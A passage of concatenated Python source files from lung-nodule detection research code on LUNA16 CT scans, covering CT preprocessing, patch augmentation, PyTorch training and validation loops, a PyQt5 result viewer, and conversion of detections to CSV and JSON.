out2_pool, indices2 = self.maxpool3(out2)
out3 = self.forw3(out2_pool) # 96
out3_pool, indices3 = self.maxpool4(out3)
out4 = self.forw4(out3_pool) # 96
rev3 = self.path1(out4)
comb3 = self.back3(torch.cat((rev3, out3), 1)) # 96+96
rev2 = self.path2(comb3)
comb2 = self.back2(torch.cat((rev2, out2, coord), 1)) # 64+64
comb2 = self.drop(comb2)
out = self.output(comb2)
size = out.size()
out = out.view(out.size(0), out.size(1), -1)
out = out.transpose(1, 2).contiguous().view(size[0], size[2], size[3], size[4], len(ANCHOR_SIZES), 5)
return out
```
#### File: Luna16/prepare/_classes.py
```python
import scipy.misc
import scipy.ndimage
import numpy as np
import SimpleITK as sitk
from prepare.utility import get_segmented_lungs, get_augmented_cube
from configs import RESOURCES_PATH, OUTPUT_PATH
from glob import glob
from skimage.measure import regionprops
class CTScan(object):
def __init__(self, seriesuid, centers, radii, clazz):
self._seriesuid = seriesuid
self._centers = centers
paths = glob(f'''{RESOURCES_PATH}/*/{self._seriesuid}.mhd''')
path = paths[0]
self._ds = sitk.ReadImage(path)
self._spacing = np.array(list(reversed(self._ds.GetSpacing())))
self._origin = np.array(list(reversed(self._ds.GetOrigin())))
self._image = sitk.GetArrayFromImage(self._ds)
self._radii = radii
self._clazz = clazz
self._mask = None
def preprocess(self):
self._resample()
self._segment_lung_from_ct_scan()
self._normalize()
self._zero_center()
self._change_coords()
def save_preprocessed_image(self):
subdir = 'negatives' if self._clazz == 0 else 'positives'
file_path = f'''preprocessed/{subdir}/{self._seriesuid}.npy'''
np.save(f'{OUTPUT_PATH}/{file_path}', self._image)
def get_info_dict(self):
(min_z, min_y, min_x, max_z, max_y, max_x) = (None, None, None, None, None, None)
for region in regionprops(self._mask):
min_z, min_y, min_x, max_z, max_y, max_x = region.bbox
assert (min_z, min_y, min_x, max_z, max_y, max_x) != (None, None, None, None, None, None)
min_point = (min_z, min_y, min_x)
max_point = (max_z, max_y, max_x)
return {'seriesuid': self._seriesuid, 'radii': self._radii, 'centers': self._centers,
'spacing': list(self._spacing), 'lungs_bounding_box': [min_point, max_point], 'class': self._clazz}
def _resample(self):
spacing = np.array(self._spacing, dtype=np.float32)
new_spacing = [1, 1, 1]
imgs = self._image
new_shape = np.round(imgs.shape * spacing / new_spacing)
true_spacing = spacing * imgs.shape / new_shape
resize_factor = new_shape / imgs.shape
imgs = scipy.ndimage.interpolation.zoom(imgs, resize_factor, mode='nearest')
self._image = imgs
self._spacing = true_spacing
def _segment_lung_from_ct_scan(self):
result_img = []
result_mask = []
for slicee in self._image:
rimg, rmsk = get_segmented_lungs(slicee)
result_img.append(rimg)
result_mask.append(rmsk)
self._image = np.asarray(result_img)
self._mask = np.asarray(result_mask, dtype=int)
def _world_to_voxel(self, worldCoord):
stretchedVoxelCoord = np.absolute(np.array(worldCoord) - np.array(self._origin))
voxelCoord = stretchedVoxelCoord / np.array(self._spacing)
return voxelCoord.astype(int)
def _get_world_to_voxel_coords(self, idx):
return tuple(self._world_to_voxel(self._centers[idx]))
def _get_voxel_coords(self):
voxel_coords = [self._get_world_to_voxel_coords(j) for j in range(len(self._centers))]
return voxel_coords
def _change_coords(self):
new_coords = self._get_voxel_coords()
self._centers = new_coords
def _normalize(self):
MIN_BOUND = -1200
MAX_BOUND = 600.
self._image = (self._image - MIN_BOUND) / (MAX_BOUND - MIN_BOUND)
self._image[self._image > 1] = 1.
self._image[self._image < 0] = 0.
self._image *= 255.
def _zero_center(self):
PIXEL_MEAN = 0.25 * 256
self._image = self._image - PIXEL_MEAN
class PatchMaker(object):
def __init__(self, seriesuid: str, coords: list, radii: list, spacing: list, lungs_bounding_box: list,
file_path: str,
clazz: int):
self._seriesuid = seriesuid
self._coords = coords
self._spacing = spacing
self._radii = radii
self._image = np.load(file=f'{file_path}')
self._clazz = clazz
self._lungs_bounding_box = lungs_bounding_box
def _get_augmented_patch(self, idx, rot_id=None):
return get_augmented_cube(img=self._image, radii=self._radii, centers=self._coords,
spacing=tuple(self._spacing), rot_id=rot_id, main_nodule_idx=idx,
lungs_bounding_box=self._lungs_bounding_box)
def get_augmented_patches(self):
radii = self._radii
list_of_dicts = []
for i in range(len(self._coords)):
times_to_sample = 1
# check the larger radius first; otherwise the > 20. branch can never be reached
if radii[i] > 20.:
times_to_sample = 6
elif radii[i] > 15.:
times_to_sample = 2
for j in range(times_to_sample):
rot_id = int((j / times_to_sample) * 24 + np.random.randint(0, int(24 / times_to_sample)))
img, radii2, centers, lungs_bounding_box, spacing, existing_nodules_in_patch = \
self._get_augmented_patch(idx=i, rot_id=rot_id)
existing_radii = [radii2[i] for i in existing_nodules_in_patch]
existing_centers = [centers[i] for i in existing_nodules_in_patch]
subdir = 'negatives' if self._clazz == 0 else 'positives'
file_path = f'''augmented/{subdir}/{self._seriesuid}_{i}_{j}.npy'''
list_of_dicts.append(
{'seriesuid': self._seriesuid, 'centers': existing_centers, 'sub_index': f'{i}_{j}',
'lungs_bounding_box': lungs_bounding_box, 'radii': existing_radii, 'class': self._clazz})
np.save(f'{OUTPUT_PATH}/{file_path}', img)
return list_of_dicts
```
#### File: JiazeWang/Luna16/train.py
```python
import random
import torch
import numpy as np
import time
import os
from model.net import Net
from model.loss import Loss
from torch.autograd import Variable
import itertools
import pandas as pd
from main.dataset import LunaDataSet
from torch.utils.data import DataLoader
from configs import VAL_PCT, TOTAL_EPOCHS, DEFAULT_LR, OUTPUT_PATH
from glob import glob
def get_lr(epoch):
if epoch <= TOTAL_EPOCHS * 0.5:
lr = DEFAULT_LR
elif epoch <= TOTAL_EPOCHS * 0.8:
lr = 0.1 * DEFAULT_LR
else:
lr = 0.01 * DEFAULT_LR
return lr
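# Worked example (assuming, hypothetically, TOTAL_EPOCHS = 100 and DEFAULT_LR = 0.01, which
# come from configs and are not shown here): epochs 0-50 use 0.01, epochs 51-80 use 0.001,
# and the remaining epochs use 0.0001.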
def train(data_loader, net, loss, epoch, optimizer, get_lr, save_dir='./models/'):
print("****************training:*******************")
start_time = time.time()
net.train()
lr = get_lr(epoch)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
metrics = []
for i, (data, target, coord) in enumerate(data_loader):
if torch.cuda.is_available():
data = Variable(data.cuda())
target = Variable(target.cuda())
coord = Variable(coord.cuda())
data = data.float()
target = target.float()
coord = coord.float()
output = net(data, coord)
loss_output = loss(output, target)
optimizer.zero_grad()
loss_output[0].backward()
optimizer.step()
loss_output[0] = loss_output[0].item()
metrics.append(loss_output)
break
metrics = np.asarray(metrics, np.float32)
if epoch % 10 == 0:
net_state_dict = net.state_dict()
for key in net_state_dict.keys():
net_state_dict[key] = net_state_dict[key].cpu()
torch.save({
'epoch': epoch,
'save_dir': save_dir,
'model_state_dict': net_state_dict,
'optimizer_state_dict': optimizer.state_dict(),
'loss': np.mean(metrics[:, 0])}, os.path.join(save_dir, f'''{epoch}.ckpt'''))
end_time = time.time()
print(f'''Epoch {epoch} (lr {lr})''')
print(f'''Train: tpr {100.0 * np.sum(metrics[:, 6]) / np.sum(metrics[:, 7])},
tnr {100.0 * np.sum(metrics[:, 8]) / np.sum(metrics[:, 9])},
total pos {np.sum(metrics[:, 7])}, total neg {np.sum(metrics[:, 9])},
time {end_time - start_time}''')
print(f'''loss {np.mean(metrics[:, 0])}, classify loss {np.mean(metrics[:, 1])},
regress loss {np.mean(metrics[:, 2])}, {np.mean(metrics[:, 3])},
{np.mean(metrics[:, 4])}, {np.mean(metrics[:, 5])}''')
def validate(data_loader, net, loss):
print("****************validation:*******************")
start_time = time.time()
net.eval()
metrics = []
for i, (data, target, coord) in enumerate(data_loader):
if torch.cuda.is_available():
data = Variable(data.cuda())
target = Variable(target.cuda())
coord = Variable(coord.cuda())
data = data.float()
target = target.float()
coord = coord.float()
output = net(data, coord)
loss_output = loss(output, target, train=False)
loss_output[0] = loss_output[0].item()
metrics.append(loss_output)
break
end_time = time.time()
metrics = np.asarray(metrics, np.float32)
print(f'''time {end_time - start_time}''')
print(f'''loss {np.mean(metrics[:, 0])}, classify loss {np.mean(metrics[:, 1])},
regress loss {np.mean(metrics[:, 2])}, {np.mean(metrics[:, 3])},
{np.mean(metrics[:, 4])}, {np.mean(metrics[:, 5])}''')
def run(load_last_checkpoint=False):
save_dir = f'{OUTPUT_PATH}/models/'
os.makedirs(save_dir, exist_ok=True)
neural_net = Net()
loss_fn = Loss()
optim = torch.optim.SGD(neural_net.parameters(), DEFAULT_LR, momentum=0.9, weight_decay=1e-4)
starting_epoch = 0
initial_loss = None
if load_last_checkpoint:
model_paths = glob(f'''{save_dir}*.ckpt''')
model_names = [int(i.split('/')[-1][:-5]) for i in model_paths]
latest_model_path = f'''{save_dir}{max(model_names)}.ckpt'''
print('loading latest model from:', latest_model_path)
checkpoint = torch.load(latest_model_path)
neural_net.load_state_dict(checkpoint['model_state_dict'])
optim.load_state_dict(checkpoint['optimizer_state_dict'])
starting_epoch = checkpoint['epoch']
initial_loss = checkpoint['loss']
if torch.cuda.is_available():
neural_net = neural_net.cuda()
loss_fn = loss_fn.cuda()
print(f'''Training from epoch: {starting_epoch} towards: {TOTAL_EPOCHS},
with learning rate starting from: {get_lr(starting_epoch)}, and loss: {initial_loss}''')
meta = pd.read_csv(f'{OUTPUT_PATH}/augmented_meta.csv', index_col=0).sample(frac=1).reset_index(drop=True)
meta_group_by_series = meta.groupby(['seriesuid']).indices
list_of_groups = [{i: list(meta_group_by_series[i])} for i in meta_group_by_series.keys()]
random.Random(0).shuffle(list_of_groups)
val_split = int(VAL_PCT * len(list_of_groups))
val_indices = list(itertools.chain(*[list(i.values())[0] for i in list_of_groups[:val_split]]))
train_indices = list(itertools.chain(*[list(i.values())[0] for i in list_of_groups[val_split:]]))
ltd = LunaDataSet(train_indices, meta)
lvd = LunaDataSet(val_indices, meta)
train_loader = DataLoader(ltd, batch_size=1, shuffle=False)
val_loader = DataLoader(lvd, batch_size=1, shuffle=False)
for ep in range(starting_epoch, TOTAL_EPOCHS):
train(train_loader, neural_net, loss_fn, ep, optim, get_lr, save_dir=save_dir)
validate(val_loader, neural_net, loss_fn)
if __name__ == '__main__':
run(load_last_checkpoint=False)
``` |
{
"source": "JiazeWang/lung_nodule_detector",
"score": 2
} |
#### File: dlung_v1/detector_viewer/xai_viewer.py
```python
import sys
import UI_util
import numpy as np
import cv2
import time
import math
from PyQt5 import QtCore, QtGui, QtWidgets
from xai_viewer_ui import Ui_xai_viewer
import torch
import res18_split_focal as detect_model
from torch.nn import DataParallel
from torch.backends import cudnn
from training.utils import *
from training.split_combine import SplitComb
#TODO: add nodule view rescale feature
class Main_Window(QtWidgets.QMainWindow, Ui_xai_viewer):
def __init__(self):
super(Main_Window,self).__init__()
## set path and gpu number
self.init_openpath = '/root/ssd_data/demo/'
self.label_dirpath = '/root/ssd_data/luna_segment_attribute/'
self.detect_resume = './detector.ckpt'
self.gpu = '1'
self.setupUi(self)
self.actionOpen.triggered.connect(self.open)
self.next_button.clicked.connect(self.next_slide)
self.prev_button.clicked.connect(self.prev_slide)
self.detect_button.clicked.connect(self.detect)
self.horizontalScrollBar.valueChanged.connect(self.scroll_slide)
self.listView.clicked.connect(self.click_nodule_list)
self.resolution = np.array([1,1,1])
self.slice_index = 0
self.slice_num = 0
self.slice_width = 0
self.slice_height = 0
self.detect_net, self.split_comber, self.get_pbb \
= self.init_net()
self.stride = 4
self.n_per_run = 1
self.detect_progressBar.setValue(0)
self.fileopen_progressBar.setValue(0)
self.file_dialog = QtWidgets.QFileDialog(directory=self.init_openpath)
self.file_dialog.setNameFilters(["mhd files (*.mhd)", "Images (*.png *.jpg)", "All Files (*.*)"])
self.file_dialog.selectNameFilter("mhd files (*.mhd)")
def keyPressEvent(self, qKeyEvent):
print(qKeyEvent.key())
if qKeyEvent.key() == QtCore.Qt.Key_Z:
print('Key_Left')
self.prev_slide()
elif qKeyEvent.key() == QtCore.Qt.Key_X:
print('Key_Right')
self.next_slide()
#else:
# super().keyPressEvent(qKeyEvent)
def init_net(self):
torch.manual_seed(0)
torch.cuda.set_device(0)
#model = import_module(self.model)
detect_config, detect_net, _, get_pbb = detect_model.get_model()
detect_checkpoint = torch.load(self.detect_resume)
detect_net.load_state_dict(detect_checkpoint['state_dict'])
n_gpu = setgpu(self.gpu)
detect_net = detect_net.cuda()
#loss = loss.cuda()
cudnn.benchmark = True
detect_net = DataParallel(detect_net)
margin = 32
sidelen = 144
split_comber = SplitComb(sidelen, detect_config['max_stride'], detect_config['stride'], margin, detect_config['pad_value'])
print ("init_net complete")
return detect_net, split_comber, get_pbb
def update_slide(self):
img = np.array(self.slice_arr[self.slice_index], dtype=np.uint8)
image = QtGui.QImage(img, self.slice_width, self.slice_height, self.slice_width * 3,
QtGui.QImage.Format_RGB888)
pixmap = QtGui.QPixmap.fromImage(image)
self.slide_show_label.setAlignment(QtCore.Qt.AlignCenter)
self.slide_show_label.setPixmap(pixmap.scaled(791, 481, QtCore.Qt.KeepAspectRatio))
self.slide_view_label.setText("Slide View " + str(self.slice_index) + "/" + str(self.slice_num - 1))
def update_slidebar(self):
self.horizontalScrollBar.blockSignals(True)
self.horizontalScrollBar.setValue(self.slice_index)
self.horizontalScrollBar.blockSignals(False)
def click_nodule_list(self, QModelIndex):
print ("click_nodule_list", QModelIndex.row())
idx = QModelIndex.row()
gt_num = 0
for i in range(len(self.lbb)):
if (self.lbb[i][3] != 0):
gt_num += 1
cand_num = len(self.world_pbb)
if (idx > gt_num - 1):
cand_idx = idx - gt_num
if (int(round(self.world_pbb[cand_idx][1])) < 0):
self.slice_index = 0
elif (int(round(self.world_pbb[cand_idx][1])) > (self.slice_num - 1)):
self.slice_index = self.slice_num - 1
else:
self.slice_index = int(round(self.world_pbb[cand_idx][1]))
else:
gt_idx = idx
self.slice_index = int(round(self.lbb[gt_idx][0]))
self.update_slide()
self.update_slidebar()
def detect(self):
if (self.slice_num <= 0):
return 0
s = time.time()
data, coord2, nzhw = UI_util.split_data(np.expand_dims(self.sliceim_re, axis=0),
self.stride, self.split_comber)
self.detect_progressBar.setValue(10)
self.gt_path = self.label_dirpath + self.pt_num + '_label.npy'
labels = np.load(self.gt_path)
e = time.time()
self.lbb, self.world_pbb = UI_util.predict_nodule(self.detect_net, data, coord2, nzhw, labels,
self.n_per_run, self.split_comber, self.get_pbb, self.detect_progressBar)
nodule_items = []
for i in range(len(self.lbb)):
if self.lbb[i][3] != 0:
nodule_items.append('gt_' + str(i))
for i in range(len(self.world_pbb)):
nodule_items.append('cand_' + str(i) + ' ' + str(round(self.world_pbb[i][0], 2)))
model = QtGui.QStandardItemModel()
for nodule in nodule_items:
model.appendRow(QtGui.QStandardItem(nodule))
self.listView.setModel(model)
print('elapsed time is %3.2f seconds' % (e - s))
UI_util.draw_nodule_rect(self.lbb, self.world_pbb, self.slice_arr)
# attrbute_list = []
# for i in range(len(self.world_pbb)):
# print (self.world_pbb[i][1:])
# print (np.shape(self.sliceim_re))
# crop_img, _ = UI_util.crop_nodule_arr_2ch(self.world_pbb[i][1:], np.expand_dims(self.sliceim_re, axis=0))
# output = UI_util.predict_attribute(self.attribute_net, crop_img.unsqueeze(0))
# print (output.cpu().data.numpy())
# attrbute_list.append(output.cpu().data.numpy())
#print ("/root/workspace/dsb2017_review/DSB2017_1/training/XAI_UI/test1" + str(i) + ".png")
#print ("/root/workspace/dsb2017_review/DSB2017_1/training/XAI_UI/test2" + str(i) + ".png")
#cv2.imwrite("/root/workspace/dsb2017_review/DSB2017_1/training/XAI_UI/test1" + str(i) + ".png", crop[0][24])
#cv2.imwrite("/root/workspace/dsb2017_review/DSB2017_1/training/XAI_UI/test2" + str(i) + ".png", crop[1][24])
# self.print_nodule_attribute(attrbute_list)
self.detect_progressBar.setValue(100)
#assert False
self.update_slide()
def open(self):
#TODO: file type check
self.file_dialog.exec_()
fileName = self.file_dialog.selectedFiles()
print("open ",fileName)
if (fileName[0] == ''):
return 0
self.pt_num = fileName[0].split('/')[-1].split('.mhd')[0]
self.detect_progressBar.setValue(0)
self.fileopen_progressBar.setValue(0)
# self.tableWidget.setRowCount(0)
# self.tableWidget.setColumnCount(0)
self.file_name.setText(fileName[0] + " opening ...")
model = QtGui.QStandardItemModel()
self.listView.setModel(model)
sliceim, origin, spacing, isflip = UI_util.load_itk_image(fileName[0])
self.fileopen_progressBar.setValue(10)
if isflip:
sliceim = sliceim[:, ::-1, ::-1]
print('flip!')
sliceim = UI_util.lumTrans(sliceim)
self.sliceim_re, _ = UI_util.resample(sliceim, spacing, self.resolution, self.fileopen_progressBar, order=1)
self.fileopen_progressBar.setValue(45)
self.slice_arr = np.zeros((np.shape(self.sliceim_re)[0], np.shape(self.sliceim_re)[1], np.shape(self.sliceim_re)[2], 3))
self.slice_num = np.shape(self.sliceim_re)[0]
self.slice_height = np.shape(self.sliceim_re)[1]
self.slice_width = np.shape(self.sliceim_re)[2]
for i in range(len(self.sliceim_re)):
self.slice_arr[i] = cv2.cvtColor(self.sliceim_re[i], 8)
self.fileopen_progressBar.setValue(45 + (45/len(self.sliceim_re))*(i+1))
print ("finish convert")
self.slice_index = int(self.slice_num/2)
img = np.array(self.slice_arr[self.slice_index], dtype=np.uint8)
image = QtGui.QImage(img, self.slice_width, self.slice_height, self.slice_width*3, QtGui.QImage.Format_RGB888)
self.update_slide()
self.file_name.setText(fileName[0] + " open completed ...")
self.horizontalScrollBar.setMaximum(self.slice_num - 1)
self.horizontalScrollBar.setMinimum(0)
self.update_slidebar()
self.fileopen_progressBar.setValue(100)
def next_slide(self):
if self.slice_index < self.slice_num - 1:
self.slice_index += 1
if (self.slice_num > 0):
self.update_slide()
self.update_slidebar()
def prev_slide(self):
if self.slice_index > 0:
self.slice_index -= 1
if (self.slice_num > 0):
self.update_slide()
self.update_slidebar()
def scroll_slide(self):
if (self.slice_num > 0):
self.slice_index = self.horizontalScrollBar.value()
self.update_slide()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
app.setApplicationName("XAI Viewer")
window = Main_Window()
window.show()
app.exec_()
```
#### File: lung_nodule_detector/dlung_v1/generate_json.py
```python
import numpy as np
import sys
from layers import nms, iou, acc
import time
import multiprocessing as mp
import math
import SimpleITK as sitk
import os
import pandas
import csv
import io
from config import config
import json
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def convert_worldcoord(idx, pbb, filename):
origin = np.load(filename+'_origin.npy')
spacing = np.load(filename+'_spacing.npy')
for label in pbb:
pos_ori = label[1:4]
radious_ori = label[4]
#pos_ori = pos_ori + extendbox[:, 0]
pos_ori = pos_ori * resolution / spacing
#pos_ori = pos_ori * spacing
#pos_ori = pos_ori + origin
pos_ori = pos_ori[::-1]
radious_ori = radious_ori / spacing[1] * resolution[1]
radious_ori = radious_ori * spacing[1]
label[1:4] = pos_ori
label[4] = radious_ori
label[0] = sigmoid(label[0])
return pbb
def duplicate_file(in_filename):
out_filename = in_filename + '.bin'
byte_string = ''
with open(in_filename, 'r') as infile:
with open(out_filename, 'wb') as outfile:
char = infile.read(1)
byte = ord(char)
# print byte
byte_string += chr(byte)
while char != "":
char = infile.read(1)
if char != "":
byte = ord(char)
# print byte
byte_string += chr(byte)
# encode before writing since the output file is opened in binary mode
outfile.write(byte_string.encode('latin-1'))
outfile.close()
def convert_json(input, output, thresholds=0.5):
with open("record_folder_series.txt", 'r') as f:
lines = f.readlines()
patientdic = {}
studydic = {}
for line in lines:
line = line.rstrip()
line = line.split(" ")
name = line[0]
patientname = name.split("/")[1]
studyname = name[8:]
for i in line[1:]:
patientdic[i] = patientname
studydic[i] = studyname
with open(input, "r") as f:
lines = f.readlines()
NoduleClass, NoduleScore, NoduleCoordinates, NoduleDiameter= [], [], [], []
nudule = {}
num = 0
result = []
record = lines[1].split(",")[0]
lines.append(lines[1])
for line in lines[1:]:
nodule_dic = {}
line = line.rstrip()
line = line.split(",")
if line[0] == record and num+1<len(lines[1:]):
NoduleScore.append(line[-1])
if float(line[-1])> thresholds:
NoduleClass.append(1)
else:
NoduleClass.append(0)
NoduleCoordinates.append([line[1], line[2], line[3]])
NoduleDiameter.append(line[4])
else:
nudule = {}
series = {"SeriesName": record, \
"PatientFolder": patientdic[record], \
"StudyFolder": studydic[record],\
"nodules": nudule,}
nudule["NoduleScore"] = NoduleScore
nudule["NoduleClass"] = NoduleClass
nudule["NoduleCoordinates"] = NoduleCoordinates
nudule["NoduleDiameter"] = NoduleDiameter
NoduleClass, NoduleScore, NoduleCoordinates, NoduleDiameter = [], [], [], []
if float(line[-1])> thresholds:
NoduleClass.append(1)
else:
NoduleClass.append(0)
NoduleScore.append(line[-1])
NoduleCoordinates.append([line[1], line[2], line[3]])
NoduleDiameter.append(line[4])
record = line[0]
result.append(series)
num = num + 1
with open(output,'w',encoding='utf-8') as f:
f.write(json.dumps(result,indent=2))
if __name__ == '__main__':
pbb = []
resolution = np.array([1,1,1])
submit_file = 'submission.txt'
filename_dict = {}
csv_submit = []
csv_sid = []
with open("record_test.txt", 'r') as f:
lines = f.readlines()
num = 0
if not os.path.exists(config["result"]):
os.makedirs(config["result"])
for i in range(len(lines)):
print("processing %s"%i)
line = lines[i].rstrip()
pbbdir = np.load(config["result"] + line + ".npy")
origin_dir = np.load(config["npy_dir"] + line + "_origin.npy")
spacing_dir = np.load(config["npy_dir"] + line + "_spacing.npy")
pbb_item = pbbdir
filename_dict[i] = str(line)
pbb_item = pbb_item[pbb_item[:, 0].argsort()[::-1]]
pbb_append_list = []
for item in pbb_item:
if sigmoid(item[0]) < 0.1:
continue
is_overlap = False
for appended in pbb_append_list:
minimum_dist = 3
# compare candidate centers (indices 1..3 hold z, y, x; index 0 is the confidence score)
dist = math.sqrt(
math.pow(appended[1] - item[1], 2) + math.pow(appended[2] - item[2], 2) + math.pow(
appended[3] - item[3], 2))
if dist < minimum_dist:
is_overlap = True
break
if not is_overlap:
pbb_append_list.append(item)
pbb.append(np.array(pbb_append_list))
pbb = np.array(pbb)
conf_th = 0.1
nms_th = 0.3
detect_th = 0.3
for i in range(len(pbb)):
nms_pbb = nms(pbb[i], nms_th)
world_pbb = convert_worldcoord(i, nms_pbb, config["npy_dir"]+filename_dict[i])
s_id = filename_dict[i]
for candidate in world_pbb:
csv_submit.append([s_id, candidate[1], candidate[2], candidate[3], candidate[4], candidate[0]])
df_annos = pandas.DataFrame(csv_submit, columns=["seriesuid", "coordX", "coordY", "coordZ", "size", "probability"])
df_annos.to_csv(submit_file, index=False)
convert_json('submission.txt', "result.json")
```
#### File: lung_nodule_detector/dlung_v1/prepare.py
```python
import os
import shutil
import numpy as np
import SimpleITK as sitk
import scipy.ndimage
from scipy.ndimage.measurements import label
from scipy.ndimage.interpolation import zoom
from scipy.ndimage.morphology import binary_dilation,generate_binary_structure
from skimage.morphology import convex_hull_image
from skimage import measure, morphology
from lungmask import mask
import pandas
import sys
import math
import glob
from multiprocessing import Pool
from config import config
def get_lung(filename, output):
reader = sitk.ImageSeriesReader()
dcm_series = reader.GetGDCMSeriesFileNames(filename)
reader.SetFileNames(dcm_series)
img = reader.Execute()
segmentation = mask.apply(img)
result_out= sitk.GetImageFromArray(segmentation)
output = output+'.mhd'
sitk.WriteImage(result_out, output)
def get_lung_mhd(filename, output):
img = sitk.ReadImage(filename)
segmentation = mask.apply(img)
result_out= sitk.GetImageFromArray(segmentation)
output = output+'.mhd'
sitk.WriteImage(result_out, output)
def resample(image, spacing, new_spacing=[1.0, 1.0, 1.0], order=1):
"""
Resample image from the original spacing to new_spacing, e.g. 1x1x1
image: 3D numpy array of raw HU values from CT series in [z, y, x] order.
spacing: float * 3, raw CT spacing in [z, y, x] order.
new_spacing: float * 3, new spacing used for resample, typically 1x1x1,
which means standardizing the raw CT with different spacing all into
1x1x1 mm.
order: int, order for resample function scipy.ndimage.interpolation.zoom
return: 3D binary numpy array with the same shape of the image after,
resampling. The actual resampling spacing is also returned.
"""
# shape can only be int, so has to be rounded.
new_shape = np.round(image.shape * spacing / new_spacing)
# the actual spacing to resample.
resample_spacing = spacing * image.shape / new_shape
resize_factor = new_shape / image.shape
image_new = scipy.ndimage.interpolation.zoom(image, resize_factor,
mode='nearest', order=order)
return (image_new, resample_spacing)
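# Worked example: a scan of shape (100, 512, 512) with spacing [2.5, 0.7, 0.7] resampled to
# [1, 1, 1] gets new_shape = round([250, 358.4, 358.4]) = [250, 358, 358]; the returned
# resample_spacing is then spacing * shape / new_shape ~= [1.0, 1.001, 1.001].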
def get_lung_box(binary_mask, new_shape, margin=5):
"""
Get the lung barely surrounding the lung based on the binary_mask and the
new_spacing.
binary_mask: 3D binary numpy array with the same shape of the image,
that only region of both sides of the lung is True.
new_shape: tuple of int * 3, new shape of the image after resamping in
[z, y, x] order.
margin: int, number of voxels to extend the boundry of the lung box.
return: 3x2 2D int numpy array denoting the
[z_min:z_max, y_min:y_max, x_min:x_max] of the lung box with respect to
the image after resampling.
"""
# list of z, y x indexes that are true in binary_mask
z_true, y_true, x_true = np.where(binary_mask)
old_shape = binary_mask.shape
lung_box = np.array([[np.min(z_true), np.max(z_true)],
[np.min(y_true), np.max(y_true)],
[np.min(x_true), np.max(x_true)]])
lung_box = lung_box * 1.0 * \
np.expand_dims(new_shape, 1) / np.expand_dims(old_shape, 1)
lung_box = np.floor(lung_box).astype('int')
z_min, z_max = lung_box[0]
y_min, y_max = lung_box[1]
x_min, x_max = lung_box[2]
# extend the lung_box by a margin
lung_box[0] = max(0, z_min-margin), min(new_shape[0], z_max+margin)
lung_box[1] = max(0, y_min-margin), min(new_shape[1], y_max+margin)
lung_box[2] = max(0, x_min-margin), min(new_shape[2], x_max+margin)
return lung_box
def worldToVoxelCoord(worldCoord, origin, spacing):
stretchedVoxelCoord = np.absolute(worldCoord - origin)
voxelCoord = stretchedVoxelCoord / spacing
return voxelCoord
def load_itk_image(filename):
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing
def load_itk_dicom(filename):
reader = sitk.ImageSeriesReader()
dcm_series = reader.GetGDCMSeriesFileNames(filename)
reader.SetFileNames(dcm_series)
img = reader.Execute()
numpyImage = sitk.GetArrayFromImage(img)
numpyOrigin = np.array(list(reversed(img.GetOrigin())))
numpySpacing = np.array(list(reversed(img.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing
def load_itk_series(filedir):
img_dir = config["img_dir"]
filename = os.path.join(img_dir, filedir)
reader = sitk.ImageSeriesReader()
seriesIDs = reader.GetGDCMSeriesIDs(filename)
seriesIDsnew = []
for i in range(0, len(seriesIDs)):
print("processing %s"%seriesIDs[i])
dcm_series = reader.GetGDCMSeriesFileNames(filename, seriesIDs[i])
reader.SetFileNames(dcm_series)
img = reader.Execute()
numpyImage = sitk.GetArrayFromImage(img)
if numpyImage.shape[0]<=10:
continue
else:
seriesIDsnew.append(seriesIDs[i])
output = os.path.join(config["mhd_dir"], seriesIDs[i]+'.mhd')
sitk.WriteImage(img, output)
return filedir+" "+" ".join(seriesIDsnew)
def lumTrans(image, HU_min=-1200.0, HU_max=600.0, HU_nan=-2000.0):
"""
Convert HU unit into uint8 values. First bound HU values by predfined min
and max, and then normalize
image: 3D numpy array of raw HU values from CT series in [z, y, x] order.
HU_min: float, min HU value.
HU_max: float, max HU value.
HU_nan: float, value for nan in the raw CT image.
"""
image_new = np.array(image)
image_new[np.isnan(image_new)] = HU_nan
# normalize to [0, 1]
image_new = (image_new - HU_min) / (HU_max - HU_min)
image_new = np.clip(image_new, 0, 1)
image_new = (image_new * 255).astype('uint8')
return image_new
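# Worked example with the default bounds: HU -1200 maps to 0, HU 600 maps to 255, and
# HU 0 (water) maps to (0 + 1200) / 1800 * 255 = 170, which is the default pad_value
# used by apply_mask below.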
def convex_hull_dilate(binary_mask, dilate_factor=1.5, iterations=10):
"""
Replace each slice with convex hull of it then dilate. Convex hulls used
only if it does not increase area by dilate_factor. This applies mainly to
the inferior slices because inferior surface of lungs is concave.
binary_mask: 3D binary numpy array with the same shape of the image,
that only region of interest is True. One side of the lung in this
specifical case.
dilate_factor: float, factor of increased area after dilation
iterations: int, number of iterations for dilation
return: 3D binary numpy array with the same shape of the image,
that only region of interest is True. Each binary mask is ROI of one
side of the lung.
"""
binary_mask_dilated = np.array(binary_mask)
for i in range(binary_mask.shape[0]):
slice_binary = binary_mask[i]
if np.sum(slice_binary) > 0:
slice_convex = morphology.convex_hull_image(slice_binary)
if np.sum(slice_convex) <= dilate_factor * np.sum(slice_binary):
binary_mask_dilated[i] = slice_convex
struct = scipy.ndimage.morphology.generate_binary_structure(3, 1)
binary_mask_dilated = scipy.ndimage.morphology.binary_dilation(
binary_mask_dilated, structure=struct, iterations=10)
return binary_mask_dilated
def apply_mask(image, binary_mask1, binary_mask2, pad_value=170,
bone_thred=210, remove_bone=False):
"""
Apply the binary mask of each lung to the image. Regions outside the lungs
are replaced with pad_value.
image: 3D uint8 numpy array.
binary_mask1: 3D binary numpy array with the same shape as the image, in
which only one side of the lung is True.
binary_mask2: 3D binary numpy array with the same shape as the image, in
which only the other side of the lung is True.
pad_value: int, uint8 value used to pad image regions that are not of
interest.
bone_thred: int, uint8 threshold used to decide which voxels of the image
are bone.
return: 3D uint8 numpy array with the same shape as the image after
applying the lung mask.
"""
binary_mask = binary_mask1 + binary_mask2
binary_mask1_dilated = convex_hull_dilate(binary_mask1)
binary_mask2_dilated = convex_hull_dilate(binary_mask2)
binary_mask_dilated = binary_mask1_dilated + binary_mask2_dilated
binary_mask_extra = binary_mask_dilated ^ binary_mask
# replace image values outside binary_mask_dilated as pad value
image_new = image * binary_mask_dilated + \
